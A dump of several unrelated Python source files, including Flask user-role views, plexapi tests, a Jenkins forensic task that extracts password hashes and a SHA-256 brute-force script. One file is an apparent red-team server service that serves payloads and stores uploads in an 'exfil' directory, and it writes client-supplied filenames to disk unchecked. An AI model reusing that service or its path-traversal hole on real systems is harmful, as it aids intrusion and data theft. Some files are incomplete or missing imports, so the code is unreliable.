# Zend Framework 2 documentation build configuration file, created by
# sphinx-quickstart on Fri Jul 6 18:55:07 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Zend Framework 2'
copyright = u'2012, Zend Technologies Ltd.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.0.0rc1'
# The full version, including alpha/beta/rc tags.
release = '2.0.0rc1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = "../../zf2_logo.png"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ZendFramework2doc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'ZendFramework2.tex', u'Zend Framework 2 Documentation',
u'Zend Technologies Ltd.', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'zendframework2', u'Zend Framework 2 Documentation',
[u'Zend Technologies Ltd.'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'ZendFramework2', u'Zend Framework 2 Documentation',
u'Zend Technologies Ltd.', 'ZendFramework2', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Hack to render the php source code without the <?php tag
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True)
|
# Copyright 2014 SolidBuilds.com. All rights reserved #
# Authors: Ling Thio <ling.thio@gmail.com>
from datetime import datetime
from flask import current_app, flash
from flask import Blueprint, redirect, render_template
from flask import request, url_for
from flask_user import current_user, login_required, roles_accepted
from flask_user.views import _get_safe_next_param, render, _send_registered_email, _endpoint_url, _do_login_user
from flask_user import signals
from webapp import db
from webapp.models.user_models import User, Role, AdminRegisterForm, EmployerRegisterForm, EmployeeRegisterForm
from webapp.models.user_models import AdminProfileForm, EmployerProfileForm, EmployeeProfileForm, SuspendUserForm
from webapp.models.user_models import TrainingVideoForm
from MappingCommon import MappingCommon
# When using a Flask app factory we must use a blueprint to avoid needing 'app' for '@app.route'
main_blueprint = Blueprint('main', __name__, template_folder='templates')
@main_blueprint.route('/')
def base_page():
return redirect(url_for('main.home_page'))
# The Home page is accessible to anyone
@main_blueprint.route('/home')
def home_page():
return render_template('pages/home_page.html')
# ----------------------------------------------------------------
# The Administrator page is accessible to authenticated users with the 'admin' role
@main_blueprint.route('/admin')
@roles_accepted('admin')
@login_required
def admin_page():
return render_template('pages/admin_page.html')
# The Administrator submenu is accessible to authenticated users with the 'admin' role
@main_blueprint.route('/admin/list_admins_employers')
@roles_accepted('admin')
@login_required
def list_admins_employers():
# Get all users that are admins or employers.
users = User.query.filter(User.roles.any((Role.name=='admin') | (Role.name=='employer'))).all()
admin_list = []
employer_list = []
for user in users:
if user.get_roles_string() == 'admin':
admin_list.append((user.last_name, user.first_name, user.email))
elif user.get_roles_string() == 'employer':
employer_list.append((user.company_name, user.last_name, user.first_name, user.email))
admin_list.sort()
employer_list.sort()
return render_template('pages/list_admins_employers_page.html', admin_list=admin_list, employer_list=employer_list)
# The Administrator submenu is accessible to authenticated users with the 'admin' role.
@main_blueprint.route('/employer/list_employees_by_admin')
@roles_accepted('admin')
@login_required
def list_employees_by_admin():
# Get all users that are employers.
employers = User.query.filter(User.roles.any(Role.name=='employer')).all()
employer_list = []
for employer in employers:
# Get all users invited by this employer.
users = User.query.filter(User.invited_by == employer.id).all()
employee_list = []
for user in users:
employee_list.append((user.last_name, user.first_name, user.email))
employee_list.sort()
employer_list.append((employer.company_name, employee_list))
employer_list.sort()
return render_template('pages/list_employees_by_admin_page.html', employer_list=employer_list)
# The Administrator submenu is accessible to authenticated users with the 'admin' role
@main_blueprint.route('/admin/admin_employer_invite')
@roles_accepted('admin')
@login_required
def admin_employer_invite():
return redirect(url_for('user.invite'))
# The Administrator submenu is accessible to authenticated users with the 'admin' role
@main_blueprint.route('/admin/suspend_admin_employer_employee', methods=['GET', 'POST'])
@roles_accepted('admin')
@login_required
def suspend_admin_employer_employee():
user_manager = current_app.user_manager
db_adapter = user_manager.db_adapter
form = SuspendUserForm(request.form)
# Process valid POST
if request.method == 'POST' and form.validate():
# Validate the specified email address.
email = form.email.data
user = User.query.filter(User.email == email).first()
if not user:
flash("No such user", "error")
return redirect(url_for('main.suspend_admin_employer_employee'))
if int(form.activate_flag.data):
activate = True
verb = 'reactivated.'
else:
activate = False
verb = 'suspended.'
db_adapter.update_object(user, active=activate)
# Save modified user record
db_adapter.commit()
flash('User has been successfully ' + verb, 'success')
# Process GET or invalid POST
return render_template('pages/suspend_admin_employer_employee_page.html', form=form)
# ----------------------------------------------------------------
# The Employer page is accessible to authenticated users with the 'employer' or 'admin' role.
@main_blueprint.route('/employer')
@roles_accepted('employer', 'admin')
@login_required
def employer_page():
return render_template('pages/employer_page.html')
# The Employer submenu is accessible to authenticated users with the 'employer' role.
@main_blueprint.route('/employer/list_employees_by employer')
@roles_accepted('employer')
@login_required
def list_employees_by_employer():
# Get all users invited by this employer.
users = User.query.filter(User.invited_by == current_user.id).all()
employee_list = []
for user in users:
employee_list.append((user.last_name, user.first_name, user.email))
employee_list.sort()
employer = User.query.filter(User.id == current_user.id).first()
return render_template('pages/list_employees_by_employer_page.html', company_name=employer.company_name, employee_list=employee_list)
# The Employer submenu is accessible to authenticated users with the 'employer' role
@main_blueprint.route('/employer/employee_invite')
@roles_accepted('employer')
@login_required
def employee_invite():
return redirect(url_for('user.invite'))
# The Employer submenu is accessible to authenticated users with the 'employer' role
@main_blueprint.route('/employer/suspend_employee', methods=['GET', 'POST'])
@roles_accepted('employer')
@login_required
def suspend_employee():
user_manager = current_app.user_manager
db_adapter = user_manager.db_adapter
form = SuspendUserForm(request.form)
# Process valid POST
if request.method == 'POST' and form.validate():
# Validate the specified email address.
email = form.email.data
user = User.query.filter((User.email == email) & (User.invited_by == current_user.id)).first()
if not user:
flash("No such employee", "error")
return redirect(url_for('main.suspend_employee'))
if int(form.activate_flag.data):
activate = True
verb = 'reactivated.'
else:
activate = False
verb = 'suspended.'
db_adapter.update_object(user, active=activate)
# Save modified user record
db_adapter.commit()
flash('Employee has been successfully ' + verb, 'success')
# Process GET or invalid POST
return render_template('pages/suspend_employee_page.html', form=form)
# ----------------------------------------------------------------
# The Employee page is accessible to authenticated users with the 'employee' or 'admin' role.
@main_blueprint.route('/employee')
@roles_accepted('employee', 'admin')
@login_required # Limits access to authenticated users
def employee_page():
return render_template('pages/employee_page.html')
# The Employee submenu is accessible to authenticated users with the 'employee' role
@main_blueprint.route('/employee/training')
@roles_accepted('employee')
@login_required # Limits access to authenticated users
def training():
trainingForm = TrainingVideoForm(request.form)
mapc = MappingCommon()
# Read configuration parameters.
videoUrl = mapc.getConfiguration('VideoUrl')
introVideo = mapc.getConfiguration('QualTest_IntroVideo')
introWidth = mapc.getConfiguration('QualTest_IntroVideoWidth')
introHeight = mapc.getConfiguration('QualTest_IntroVideoHeight')
instructionalVideo = mapc.getConfiguration('QualTest_InstructionalVideo')
instructionalWidth = mapc.getConfiguration('QualTest_InstructionalVideoWidth')
instructionalHeight = mapc.getConfiguration('QualTest_InstructionalVideoHeight')
introUrl = "%s/%s" % (videoUrl, introVideo)
instructionalUrl = "%s/%s" % (videoUrl, instructionalVideo)
# Load up the training form.
trainingForm.introUrl.data = introUrl
trainingForm.introWidth.data = introWidth
trainingForm.introHeight.data = introHeight
trainingForm.instructionalUrl.data = instructionalUrl
trainingForm.instructionalWidth.data = instructionalWidth
trainingForm.instructionalHeight.data = instructionalHeight
return render_template('pages/training_page.html', form=trainingForm)
# ----------------------------------------------------------------
# The registration page is accessible to all users by invitation only.
def register():
""" Display registration form and create new User."""
user_manager = current_app.user_manager
db_adapter = user_manager.db_adapter
safe_next = _get_safe_next_param('next', user_manager.after_login_endpoint)
safe_reg_next = _get_safe_next_param('reg_next', user_manager.after_register_endpoint)
# invite token used to determine validity of registeree
invite_token = request.values.get("token")
# require invite without a token should disallow the user from registering
if user_manager.require_invitation and not invite_token:
flash("Registration is invite only", "error")
return redirect(url_for('user.login'))
user_invite = None
if invite_token and db_adapter.UserInvitationClass:
user_invite = db_adapter.find_first_object(db_adapter.UserInvitationClass, token=invite_token)
if user_invite is None:
flash("Invalid invitation token", "error")
return redirect(url_for('user.login'))
# Initialize form
login_form = user_manager.login_form() # for login_or_register.html
if user_invite.role == 'admin':
register_form = AdminRegisterForm(request.form)
elif user_invite.role == 'employer':
register_form = EmployerRegisterForm(request.form)
elif user_invite.role == 'employee':
register_form = EmployeeRegisterForm(request.form)
if user_invite:
register_form.invite_token.data = invite_token
if request.method!='POST':
login_form.next.data = register_form.next.data = safe_next
login_form.reg_next.data = register_form.reg_next.data = safe_reg_next
if user_invite:
register_form.email.data = user_invite.email
if hasattr(db_adapter.UserInvitationClass, 'role'):
register_form.role.data = user_invite.role
# Process valid POST
if request.method=='POST' and register_form.validate():
# Create a User object using Form fields that have a corresponding User field
User = db_adapter.UserClass
user_class_fields = User.__dict__
user_fields = {}
# Create a UserEmail object using Form fields that have a corresponding UserEmail field
if db_adapter.UserEmailClass:
UserEmail = db_adapter.UserEmailClass
user_email_class_fields = UserEmail.__dict__
user_email_fields = {}
# Create a UserAuth object using Form fields that have a corresponding UserAuth field
if db_adapter.UserAuthClass:
UserAuth = db_adapter.UserAuthClass
user_auth_class_fields = UserAuth.__dict__
user_auth_fields = {}
Role = db_adapter.RoleClass
role_class_fields = Role.__dict__
role_fields = {}
# Enable user account
if db_adapter.UserProfileClass:
if hasattr(db_adapter.UserProfileClass, 'active'):
user_auth_fields['active'] = True
elif hasattr(db_adapter.UserProfileClass, 'is_enabled'):
user_auth_fields['is_enabled'] = True
else:
user_auth_fields['is_active'] = True
else:
if hasattr(db_adapter.UserClass, 'active'):
user_fields['active'] = True
elif hasattr(db_adapter.UserClass, 'is_enabled'):
user_fields['is_enabled'] = True
else:
user_fields['is_active'] = True
# For all form fields
role = None
for field_name, field_value in register_form.data.items():
# Hash password field
if field_name=='password':
hashed_password = user_manager.hash_password(field_value)
if db_adapter.UserAuthClass:
user_auth_fields['password'] = hashed_password
else:
user_fields['password'] = hashed_password
elif field_name == 'role':
role = Role.query.filter(Role.name == field_value).first()
# Store corresponding Form fields into the User object and/or UserProfile object
else:
if field_name in user_class_fields:
user_fields[field_name] = field_value
if db_adapter.UserEmailClass:
if field_name in user_email_class_fields:
user_email_fields[field_name] = field_value
if db_adapter.UserAuthClass:
if field_name in user_auth_class_fields:
user_auth_fields[field_name] = field_value
if user_invite:
user_fields['invited_by'] = user_invite.invited_by
# Add User record using named arguments 'user_fields'
user = db_adapter.add_object(User, **user_fields)
if (role):
user.roles.append(role)
if db_adapter.UserProfileClass:
user_profile = user
# Add UserEmail record using named arguments 'user_email_fields'
if db_adapter.UserEmailClass:
user_email = db_adapter.add_object(UserEmail,
user=user,
is_primary=True,
**user_email_fields)
else:
user_email = None
# Add UserAuth record using named arguments 'user_auth_fields'
if db_adapter.UserAuthClass:
user_auth = db_adapter.add_object(UserAuth, **user_auth_fields)
if db_adapter.UserProfileClass:
user = user_auth
else:
user.user_auth = user_auth
require_email_confirmation = True
if user_invite:
if user_invite.email == register_form.email.data:
require_email_confirmation = False
db_adapter.update_object(user, confirmed_at=datetime.utcnow())
# Clear token so invite can only be used once.
user_invite.token = None
db_adapter.commit()
# Send 'registered' email and delete new User object if send fails
if user_manager.send_registered_email:
try:
# Send 'registered' email
_send_registered_email(user, user_email, require_email_confirmation)
except Exception as e:
# delete new User object if send fails
db_adapter.delete_object(user)
db_adapter.commit()
raise
# Send user_registered signal
signals.user_registered.send(current_app._get_current_object(),
user=user,
user_invite=user_invite)
# Redirect if USER_ENABLE_CONFIRM_EMAIL is set
if user_manager.enable_confirm_email and require_email_confirmation:
safe_reg_next = user_manager.make_safe_url_function(register_form.reg_next.data)
return redirect(safe_reg_next)
# Auto-login after register or redirect to login page
if 'reg_next' in request.args:
safe_reg_next = user_manager.make_safe_url_function(register_form.reg_next.data)
else:
safe_reg_next = _endpoint_url(user_manager.after_confirm_endpoint)
if user_manager.auto_login_after_register:
return _do_login_user(user, safe_reg_next) # auto-login
else:
return redirect(url_for('user.login')+'?next='+quote(safe_reg_next)) # redirect to login page
# Process GET or invalid POST
return render(user_manager.register_template,
form=register_form,
login_form=login_form,
register_form=register_form)
# ----------------------------------------------------------------
@main_blueprint.route('/user/profile', methods=['GET', 'POST'])
@login_required
def user_profile():
# Initialize form
if current_user.has_role('admin'):
form = AdminProfileForm(request.form)
elif current_user.has_role('employer'):
form = EmployerProfileForm(request.form)
elif current_user.has_role('employee'):
form = EmployeeProfileForm(request.form)
# Process valid POST
if request.method == 'POST' and form.validate():
# Copy form fields to user_profile fields
form.populate_obj(current_user)
# Save user_profile
db.session.commit()
# Redirect to user_profile page
return redirect(url_for('main.user_profile'))
# Process GET or invalid POST
return render_template('pages/user_profile_page.html', form=form)
# ----------------------------------------------------------------
@main_blueprint.route('/select_role_page')
@login_required
def select_role_page():
if current_user.has_role('admin'):
return redirect(url_for('main.admin_page'))
elif current_user.has_role('employer'):
return redirect(url_for('main.employer_page'))
elif current_user.has_role('employee'):
return redirect(url_for('main.employee_page'))
return redirect(url_for('main.home_page'))
|
"""
UnionFind disjoint sets data structure.
"""
from . import unionfind
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@File : __init__.py.py
@Time : 2020/3/27 22:36
@Author : Empty Chan
@Contact : chen19941018@gmail.com
@Description:
@License : (C) Copyright 2016-2020, iFuture Corporation Limited.
"""
from . import *
|
# -*- coding: utf-8 -*-
import pytest
from plexapi.exceptions import BadRequest, NotFound
from . import conftest as utils
def test_myplex_accounts(account, plex):
assert account, "Must specify username, password & resource to run this test."
print("MyPlexAccount:")
print("username: %s" % account.username)
print("email: %s" % account.email)
print("home: %s" % account.home)
print("queueEmail: %s" % account.queueEmail)
assert account.username, "Account has no username"
assert account.authenticationToken, "Account has no authenticationToken"
assert account.email, "Account has no email"
assert account.home is not None, "Account has no home"
assert account.queueEmail, "Account has no queueEmail"
account = plex.account()
print("Local PlexServer.account():")
print("username: %s" % account.username)
# print('authToken: %s' % account.authToken)
print("signInState: %s" % account.signInState)
assert account.username, "Account has no username"
assert account.authToken, "Account has no authToken"
assert account.signInState, "Account has no signInState"
def test_myplex_resources(account):
assert account, "Must specify username, password & resource to run this test."
resources = account.resources()
for resource in resources:
name = resource.name or "Unknown"
connections = [c.uri for c in resource.connections]
connections = ", ".join(connections) if connections else "None"
print("%s (%s): %s" % (name, resource.product, connections))
assert resources, "No resources found for account: %s" % account.name
def test_myplex_connect_to_resource(plex, account):
servername = plex.friendlyName
for resource in account.resources():
if resource.name == servername:
break
assert resource.connect(timeout=10)
def test_myplex_devices(account):
devices = account.devices()
for device in devices:
name = device.name or "Unknown"
connections = ", ".join(device.connections) if device.connections else "None"
print("%s (%s): %s" % (name, device.product, connections))
assert devices, "No devices found for account: %s" % account.name
def test_myplex_device(account, plex):
assert account.device(plex.friendlyName)
def _test_myplex_connect_to_device(account):
devices = account.devices()
for device in devices:
if device.name == "some client name" and len(device.connections):
break
client = device.connect()
assert client, "Unable to connect to device"
def test_myplex_users(account):
users = account.users()
if not len(users):
return pytest.skip("You have to add a shared account into your MyPlex")
print("Found %s users." % len(users))
user = account.user(users[0].title)
print("Found user: %s" % user)
assert user, "Could not find user %s" % users[0].title
assert (
len(users[0].servers[0].sections()) > 0
), "Couldn't info about the shared libraries"
def test_myplex_resource(account, plex):
assert account.resource(plex.friendlyName)
def test_myplex_webhooks(account):
if account.subscriptionActive:
assert isinstance(account.webhooks(), list)
else:
with pytest.raises(BadRequest):
account.webhooks()
def test_myplex_addwebhooks(account):
if account.subscriptionActive:
assert "http://example.com" in account.addWebhook("http://example.com")
else:
with pytest.raises(BadRequest):
account.addWebhook("http://example.com")
def test_myplex_deletewebhooks(account):
if account.subscriptionActive:
assert "http://example.com" not in account.deleteWebhook("http://example.com")
else:
with pytest.raises(BadRequest):
account.deleteWebhook("http://example.com")
def test_myplex_optout(account_once):
def enabled():
ele = account_once.query("https://plex.tv/api/v2/user/privacy")
lib = ele.attrib.get("optOutLibraryStats")
play = ele.attrib.get("optOutPlayback")
return bool(int(lib)), bool(int(play))
account_once.optOut(library=True, playback=True)
utils.wait_until(lambda: enabled() == (True, True))
account_once.optOut(library=False, playback=False)
utils.wait_until(lambda: enabled() == (False, False))
@pytest.mark.authenticated
@pytest.mark.xfail(reason="Test account is missing online media sources?")
def test_myplex_onlineMediaSources_optOut(account):
onlineMediaSources = account.onlineMediaSources()
for optOut in onlineMediaSources:
if optOut.key == 'tv.plex.provider.news':
# News is no longer available
continue
optOutValue = optOut.value
optOut.optIn()
assert optOut.value == 'opt_in'
optOut.optOut()
assert optOut.value == 'opt_out'
if optOut.key == 'tv.plex.provider.music':
with pytest.raises(BadRequest):
optOut.optOutManaged()
else:
optOut.optOutManaged()
assert optOut.value == 'opt_out_managed'
# Reset original value
optOut._updateOptOut(optOutValue)
with pytest.raises(NotFound):
onlineMediaSources[0]._updateOptOut('unknown')
def test_myplex_inviteFriend_remove(account, plex, mocker):
inv_user = "hellowlol"
vid_filter = {"contentRating": ["G"], "label": ["foo"]}
secs = plex.library.sections()
ids = account._getSectionIds(plex.machineIdentifier, secs)
mocker.patch.object(account, "_getSectionIds", return_value=ids)
with utils.callable_http_patch():
account.inviteFriend(
inv_user,
plex,
secs,
allowSync=True,
allowCameraUpload=True,
allowChannels=False,
filterMovies=vid_filter,
filterTelevision=vid_filter,
filterMusic={"label": ["foo"]},
)
assert inv_user not in [u.title for u in account.users()]
with pytest.raises(NotFound):
with utils.callable_http_patch():
account.removeFriend(inv_user)
def test_myplex_updateFriend(account, plex, mocker, shared_username):
vid_filter = {"contentRating": ["G"], "label": ["foo"]}
secs = plex.library.sections()
user = account.user(shared_username)
ids = account._getSectionIds(plex.machineIdentifier, secs)
mocker.patch.object(account, "_getSectionIds", return_value=ids)
mocker.patch.object(account, "user", return_value=user)
with utils.callable_http_patch():
account.updateFriend(
shared_username,
plex,
secs,
allowSync=True,
removeSections=True,
allowCameraUpload=True,
allowChannels=False,
filterMovies=vid_filter,
filterTelevision=vid_filter,
filterMusic={"label": ["foo"]},
)
def test_myplex_createExistingUser(account, plex, shared_username):
user = account.user(shared_username)
url = "https://plex.tv/api/invites/requested/{}?friend=0&server=0&home=1".format(
user.id
)
account.createExistingUser(user, plex)
assert shared_username in [u.username for u in account.users() if u.home is True]
# Remove Home invite
account.query(url, account._session.delete)
# Confirm user was removed from home and has returned to friend
assert shared_username not in [
u.username for u in plex.myPlexAccount().users() if u.home is True
]
assert shared_username in [
u.username for u in plex.myPlexAccount().users() if u.home is False
]
@pytest.mark.skip(reason="broken test?")
def test_myplex_createHomeUser_remove(account, plex):
homeuser = "New Home User"
account.createHomeUser(homeuser, plex)
assert homeuser in [u.title for u in plex.myPlexAccount().users() if u.home is True]
account.removeHomeUser(homeuser)
assert homeuser not in [
u.title for u in plex.myPlexAccount().users() if u.home is True
]
def test_myplex_plexpass_attributes(account_plexpass):
assert account_plexpass.subscriptionActive
assert account_plexpass.subscriptionStatus == "Active"
assert account_plexpass.subscriptionPlan
assert "sync" in account_plexpass.subscriptionFeatures
assert "premium_music_metadata" in account_plexpass.subscriptionFeatures
assert "plexpass" in account_plexpass.roles
assert utils.ENTITLEMENTS <= set(account_plexpass.entitlements)
def test_myplex_claimToken(account):
assert account.claimToken().startswith("claim-")
|
import os
from aiohttp import web
from app.utility.logger import Logger
class FileSvc:
def __init__(self, payload_dirs, exfil_dir):
self.payload_dirs = payload_dirs
self.log = Logger('file_svc')
self.exfil_dir = exfil_dir
async def download(self, request):
name = request.headers.get('file')
file_path, headers = await self.find_file(name)
if file_path:
self.log.debug('downloading %s...' % name)
return web.FileResponse(path=file_path, headers=headers)
return web.HTTPNotFound(body='File not found')
async def find_file(self, name):
for store in self.payload_dirs:
for root, dirs, files in os.walk(store):
if name in files:
headers = dict([('CONTENT-DISPOSITION', 'attachment; filename="%s"' % name)])
return os.path.join(root, name), headers
return None, None
async def upload(self, request):
try:
reader = await request.multipart()
exfil_dir = await self._create_unique_exfil_sub_directory()
while True:
field = await reader.next()
if not field:
break
filename = field.filename
with open(os.path.join(exfil_dir, filename), 'wb') as f:
while True:
chunk = await field.read_chunk()
if not chunk:
break
f.write(chunk)
self.log.debug('Uploaded file %s' % filename)
return web.Response()
except Exception as e:
self.log.debug('Exception uploading file %s' % e)
""" PRIVATE """
async def _create_unique_exfil_sub_directory(self):
dir_name = str(uuid.uuid4())
path = os.path.join(self.exfil_dir, dir_name)
os.makedirs(path)
return path
|
from yowsup.structs import ProtocolEntity, ProtocolTreeNode
class AckProtocolEntity(ProtocolEntity):
'''
<ack class="{{receipt | message | ?}}" id="{{message_id}}">
</ack>
'''
def __init__(self, _id, _class):
super(AckProtocolEntity, self).__init__("ack")
self._id = _id
self._class = _class
def getId(self):
return self._id
def getClass(self):
return self._class
def toProtocolTreeNode(self):
attribs = {
"id" : self._id,
"class" : self._class,
}
return self._createProtocolTreeNode(attribs, None, data = None)
def __str__(self):
out = "ACK:\n"
out += "ID: %s\n" % self._id
out += "Class: %s\n" % self._class
return out
@staticmethod
def fromProtocolTreeNode(node):
return AckProtocolEntity(
node.getAttributeValue("id"),
node.getAttributeValue("class")
)
|
#!/usr/bin/env python3
import hashlib
def main():
print(hashlib.sha256("hugh,13145820,20193833".encode("ascii")).hexdigest())
# 13145820
guess_flag = True
digits = 1
while guess_flag:
bound = 10**digits
guess = 0
while guess < bound:
guess_str = ("hugh,{:0" + str(digits) +
"d},20193833").format(guess)
print(guess_str, end='\r')
result = hashlib.sha256(guess_str.encode("ascii")).hexdigest()
if result == "ee688ca24c201a27fcc94ebd46e87ae6a7c4f54b445fccfc0727a70332353f7f":
print("Right! %s" % guess)
guess_flag = False
break
guess += 1
digits += 1
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Task for analysing Jenkins."""
from __future__ import unicode_literals
import os
import re
from turbinia import TurbiniaException
from turbinia.evidence import ReportText
from turbinia.lib import text_formatter as fmt
from turbinia.workers import TurbiniaTask
from turbinia.workers import Priority
from turbinia.lib.utils import extract_files
from turbinia.lib.utils import bruteforce_password_hashes
class JenkinsAnalysisTask(TurbiniaTask):
"""Task to analyze a Jenkins install."""
def run(self, evidence, result):
"""Run the Jenkins worker.
Args:
evidence (Evidence object): The evidence to process
result (TurbiniaTaskResult): The object to place task results into.
Returns:
TurbiniaTaskResult object.
"""
# Where to store the resulting output file.
output_file_name = 'jenkins_analysis.txt'
output_file_path = os.path.join(self.output_dir, output_file_name)
# What type of evidence we should output.
output_evidence = ReportText(source_path=output_file_path)
# TODO(aarontp): We should find a more optimal solution for this because
# this requires traversing the entire filesystem and extracting more files
# than we need. Tracked in https://github.com/google/turbinia/issues/402
try:
collected_artifacts = extract_files(
file_name='config.xml', disk_path=evidence.local_path,
output_dir=os.path.join(self.output_dir, 'artifacts'))
except TurbiniaException as e:
result.close(self, success=False, status=str(e))
return result
jenkins_artifacts = []
jenkins_re = re.compile(r'^.*jenkins[^\/]*(\/users\/[^\/]+)*\/config\.xml$')
for collected_artifact in collected_artifacts:
if re.match(jenkins_re, collected_artifact):
jenkins_artifacts.append(collected_artifact)
version = None
credentials = []
for filepath in jenkins_artifacts:
with open(filepath, 'r') as input_file:
config = input_file.read()
extracted_version = self._extract_jenkins_version(config)
extracted_credentials = self._extract_jenkins_credentials(config)
if extracted_version:
version = extracted_version
credentials.extend(extracted_credentials)
(report, priority, summary) = self.analyze_jenkins(version, credentials)
output_evidence.text_data = report
result.report_data = report
result.report_priority = priority
# Write the report to the output file.
with open(output_file_path, 'wb') as fh:
fh.write(output_evidence.text_data.encode('utf8'))
fh.write('\n'.encode('utf8'))
# Add the resulting evidence to the result object.
result.add_evidence(output_evidence, evidence.config)
result.close(self, success=True, status=summary)
return result
@staticmethod
def _extract_jenkins_version(config):
"""Extract version from Jenkins configuration files.
Args:
config (str): configuration file content.
Returns:
str: The version of Jenkins.
"""
version = None
version_re = re.compile('<version>(.*)</version>')
version_match = re.search(version_re, config)
if version_match:
version = version_match.group(1)
return version
@staticmethod
def _extract_jenkins_credentials(config):
"""Extract credentials from Jenkins configuration files.
Args:
config (str): configuration file content.
Returns:
list: of tuples with username and password hash.
"""
credentials = []
password_hash_re = re.compile('<passwordHash>#jbcrypt:(.*)</passwordHash>')
username_re = re.compile('<fullName>(.*)</fullName>')
password_hash_match = re.search(password_hash_re, config)
username_match = re.search(username_re, config)
if username_match and password_hash_match:
username = username_match.group(1)
password_hash = password_hash_match.group(1)
credentials.append((username, password_hash))
return credentials
@staticmethod
def analyze_jenkins(version, credentials):
"""Analyses a Jenkins configuration.
Args:
version (str): Version of Jenkins.
credentials (list): of tuples with username and password hash.
Returns:
Tuple(
report_text(str): The report data
report_priority(int): The priority of the report (0 - 100)
summary(str): A summary of the report (used for task status)
)
"""
report = []
summary = ''
